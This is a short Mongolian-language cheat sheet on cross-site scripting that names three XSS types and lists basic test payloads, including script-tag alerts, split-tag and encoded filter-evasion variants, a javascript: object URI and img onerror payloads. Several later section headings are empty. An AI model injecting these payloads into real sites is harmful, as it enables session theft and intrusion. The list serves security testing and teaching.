⚔️XSS (Cross-Site Scripting)

XSS халдлага

XSS халдлага нь вэб аппликейшны халдлагын нэгээхэн том төлөөлөл бөгөөд хакер энэхүү халдлагыг хийснээр хэрэглэгчдийн session value-г хулгайлах, нууц мэдээллийг олж авах зэрэг олон эрсдэлийг үүсгэх боломжтой

XSS нь дотроо 3 төрөл байдаг

  • DOM-based XSS

  • Reflected XSS

  • Stored XSS

Basic Payload

<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">

<img> tag ашигласан payload

<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

<svg> tag ашигласан payload

<div> tag ашигласан payload

HTML5-н tag-ууд ашигласан payload

XSS filter bypass аргууд

XSS халдлагатай холбоотой жишээ 1:

XSS халдлагатай холбоотой жишээ 2:

Last updated